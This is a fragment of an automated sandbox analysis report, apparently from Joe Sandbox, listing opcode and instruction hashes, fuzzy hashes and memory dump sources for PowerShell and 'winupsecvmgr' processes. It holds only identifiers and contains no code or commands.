                                                                                                                                                                                              • Instruction ID: 58ff14b61e5e8f73d3a9703c4915c4198271a18216b2b03d0d8b4b17be4a6ce0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2dfa7707a2d4e303a1a78d16bdb6f7eaf57818cde39d8471c90da31edd0f8fca
                                                                                                                                                                                              • Instruction Fuzzy Hash: CF117061F0D60386EF54AB1CE480178E291AFB6B02BE04434C74D4B358DF7DE9439B68
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000026.00000002.3336301274.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_38_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d4fd857365dd23b7846ce6aa9a377be7090b325d9885b7f1826bf1ac7a559f55
                                                                                                                                                                                              • Instruction ID: 47ca8573341ca341ad208fbd28901f72c5aefca6fb3afd8b52a454209e7a80f7
                                                                                                                                                                                              • Opcode Fuzzy Hash: d4fd857365dd23b7846ce6aa9a377be7090b325d9885b7f1826bf1ac7a559f55
                                                                                                                                                                                              • Instruction Fuzzy Hash: 65E1B370A08A4D8FDB98EF5CC895AB97BE1FF69300F1441AAD449D7296CA78F841C7C1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000026.00000002.3336301274.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_38_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: f30fd17eddda3130a43324248287b02bd0c6b1ba9e2269c38a880aa26387fbf5
                                                                                                                                                                                              • Instruction ID: 4bb5110a7e880e40346ba498b7f65906e31430bb02db875abd101640abdc67b5
                                                                                                                                                                                              • Opcode Fuzzy Hash: f30fd17eddda3130a43324248287b02bd0c6b1ba9e2269c38a880aa26387fbf5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 67214BA3A4F5C18FFB854A2C0CA94747FE0EF5624038881BBE58CC74A7E969BC0593C5
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000026.00000002.3338010443.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_38_2_7ffd34840000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 94463c15e55219ed7623d95236d636c981c07701bd1ac1d2ee76280d1fa89ba6
                                                                                                                                                                                              • Instruction ID: de3b7071a8bda837d95d1ec74a0f79db5795772ecb4de0e19ccdeded1b9f5cb2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 94463c15e55219ed7623d95236d636c981c07701bd1ac1d2ee76280d1fa89ba6
                                                                                                                                                                                              • Instruction Fuzzy Hash: B0512822B0DE4A0FEBA9DB5C54A117477D2EF9A720B1800BBC25DC72E3DE18EC559345
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000026.00000002.3336301274.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_38_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 1823c8c6ae8d71fafeb54b67ad4eb8953553e0c5a4af1e81bd0e8fe9ee4be1d9
                                                                                                                                                                                              • Instruction ID: 5b299fff34e7175ac0e9b03a095ab5f5ffe283d6ef0b851561980486ab9fa307
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1823c8c6ae8d71fafeb54b67ad4eb8953553e0c5a4af1e81bd0e8fe9ee4be1d9
                                                                                                                                                                                              • Instruction Fuzzy Hash: DD31267191CB488FDB18DB5C9C4A6A97BE0FB59320F00426FE449C3252DB75A855CBC2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000026.00000002.3334911557.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_38_2_7ffd3465d000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4d3f19bba9c800613b451386357f7d34b88348dd92bcbe1130a8ef8594d37257
                                                                                                                                                                                              • Instruction ID: 76afc75d4ff07aa00a4acfdfc71224cb3d92eb072678fed71e475b3d1271422d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d3f19bba9c800613b451386357f7d34b88348dd92bcbe1130a8ef8594d37257
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D41047150DBC45FEB568B29D8919923FF0EF57320B1906EFD088CB1A3D629A846C792
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000026.00000002.3336301274.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_38_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2149c300804031a0aaacf4daf3139927b7feda3132f1d5085d8b043b2f1e7dfb
                                                                                                                                                                                              • Instruction ID: dfc7e68ff653ebcf03364b62a1557e78df12eda2a2ec81fefe22ec6d1e9c3c72
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2149c300804031a0aaacf4daf3139927b7feda3132f1d5085d8b043b2f1e7dfb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7421077090CB4C8FDB59DFAC984A7F97BE0EB96321F00426BD049C3152D674A41ACB92
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000026.00000002.3338010443.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_38_2_7ffd34840000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 216c3dc0e23108bbab1eed89ef337e3cfa784020d2716f5d0e614808f235a503
                                                                                                                                                                                              • Instruction ID: 9c3dfd96293e9989967dabb6840befe421c145beef0a0936f7d74322016769d9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 216c3dc0e23108bbab1eed89ef337e3cfa784020d2716f5d0e614808f235a503
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3221F222B0DA860FE7A6CB5854B11746AC2EF5A72075900BAD25DC73F3DE2CEC44A345
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000026.00000002.3336301274.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_38_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                                                                                                                                                                              • Instruction ID: 5a6c34de5bf3d62e771097e1cb750c3a3bfe75f3af7f3ffe4a0163a03f82cad5
                                                                                                                                                                                              • Opcode Fuzzy Hash: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C01447121CB088FD744EF4CE491AA5B7E0FB95364F50056EE58AC3651D626E881CB45
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000026.00000002.3338010443.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_38_2_7ffd34840000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c57efe58bd40db50de21f599f863a5b3d3ebef7c418e1283a33524f81b735830
                                                                                                                                                                                              • Instruction ID: 14d6324ca8118e7b3065031f7ab0d61cb4fd0b9ec579f71f9ec3cfb6a56ef22d
                                                                                                                                                                                              • Opcode Fuzzy Hash: c57efe58bd40db50de21f599f863a5b3d3ebef7c418e1283a33524f81b735830
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5CF09032A0D6448FD7A5EB4894A15A477E0EF0A32071500B7E15DCB263DA2AEC44C750
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000026.00000002.3338010443.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_38_2_7ffd34840000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2efa4fa8a581c2d1efa427fc0596aa10c5789bfa1fef0d1ec401171a229f518f
                                                                                                                                                                                              • Instruction ID: 9ebaf1aa69561397593b975938f1b5ae81866f39e5473adfbf1fbcd25ab965d7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2efa4fa8a581c2d1efa427fc0596aa10c5789bfa1fef0d1ec401171a229f518f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 72F0303171CF044FE748EE2DE4496A6B7E1FBA8355F10462FE44AC3651DA25E8818786
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000002B.00000002.3513208214.00007FF7AD1B1000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF7AD1B0000, based on PE: true
                                                                                                                                                                                              • Associated: 0000002B.00000002.3513160910.00007FF7AD1B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000002B.00000002.3513332981.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000002B.00000002.3513406086.00007FF7AD1CC000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000002B.00000002.3517959193.00007FF7AD737000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000002B.00000002.3518028839.00007FF7AD739000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000002B.00000002.3519874060.00007FF7AD740000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000002B.00000002.3519874060.00007FF7AD742000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000002B.00000002.3520039126.00007FF7AD745000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              • Associated: 0000002B.00000002.3520142159.00007FF7AD746000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_43_2_7ff7ad1b0000_winupsecvmgr.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                              • Instruction ID: a686bdfabce61223eedb1c978552a0642d50a4d9c3fbc1cb8676e18417c146f3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                              • Instruction Fuzzy Hash: FDB012B090E30A94E3093F21E8412587220EB08740FC35030C80C03372EEBC50805731